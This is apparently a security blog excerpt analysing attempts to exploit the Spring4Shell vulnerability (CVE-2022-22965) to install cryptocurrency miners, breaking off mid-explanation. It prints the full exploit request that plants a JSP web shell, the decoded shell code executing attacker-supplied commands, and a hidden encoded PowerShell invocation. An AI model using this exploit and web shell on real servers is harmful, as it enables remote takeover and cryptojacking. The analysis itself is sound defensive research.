Analyzing Attempts to Exploit the Spring4Shell Vulnerability CVE-2022-22965 to Deploy Cryptocurrency Miners

Share on facebook
Share on twitter
Share on linkedin
Share on reddit

Among the exploitation attempts were ones aimed at deploying cryptocurrency miners. In this section, we look at how the malicious actors behind these exploitation attempts create a web shell to deploy their cryptocurrency miners.

The following code is used to create the web shell:

GET /?class.module.classLoader.resources.context.parent.pipeline.first.prefix=zbc0fb&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps%2FROOT&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bx%7Di+try+%7BRuntime.getRuntime%28%29.exec%28System.getProperty%28%22os.name%22%29.contains%28%22ndo%22%29+%3F+new+String%5B%5D%7B%22cmd.exe%22%2C+%22%2Fc%22%2C+request.getParameter%28%22w%22%29%7D+%3A+new+String%5B%5D%7B%22%2Fbin%2Fsh%22%2C+%22-c%22%2C+request.getParameter%28%22l%22%29%7D%29%3B%7D+catch+%28Exception+e%29+%7B%7D%3Bout.print%28%22%40pong%22%29%3B+%25%7Bz%7Di HTTP/1.1 Host: <redacted>:<redacted> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: */* Accept-Language: en-US,en;q=0.5 X: <% Y: Runtime Z: %>// Accept-Encoding: gzip  

The web shell’s content is URL-encoded using the following code:

%25%7Bx%7Di+try+%7BRuntime.getRuntime%28%29.exec%28System.getProperty%28%22os.name%22%29.contains%28%22ndo%22%29+%3F +new+String%5B%5D%7B%22cmd.exe%22%2C+%22%2Fc%22%2C+request.getParameter%28%22w%22%29%7D+%3A+new+String%5B%5D%7B%22%2Fbin%2Fsh%22%2C+%22- c%22%2C+request.getParameter%28%22l%22%29%7D%29%3B%7D+catch+%28Exception+e%29+%7B%7D%3Bout.print%28%22%40pong%22%29%3B+%25%7Bz%7Di  

After decoding, the resulting payload is a Spring4Shell web shell:

%{x}i try {Runtime.getRuntime().exec(System.getProperty(“os.name”).contains(“ndo”) ? new String[]{“cmd.exe”, “/c”, request.getParameter(“w”)} : new String[]{“/bin/sh”, “-c”, request.getParameter(“l”)});} catch (Exception e) {};out.print(“@pong”); %{z}I  

Before executing the payload, the malicious actors first have to determine the operating system of the machine they are infecting. They do this using a string check to see if “os.name” contains the word “ndo”. If it does, then the machine is identified as Windows-based, otherwise the machine is identified as Linux-based.

Once the operating system is identified, the encoded payload is executed. The exploit uniform resource identifier (URI) containing the web shell path and parameters is shown in the following code:

/zbc0fb.jsp?w=powershell.exe+-NonI+-W+Hidden+-NoP+-Exec+Bypass+-Enc+<base64 encoded content> &l=echo+<base64 encoded content>  

The web shell is identified as zbc0fb.jsp, while the parameters w and l stand for, respectively, Windows and Linux payloads, which are Base64-encoded.

PowerShell is then executed using the following parameters:

NonI: Run noninteractive session. W: Hide WindowStyle. NoP:

Read more

Explore the site

More from the blog

Latest News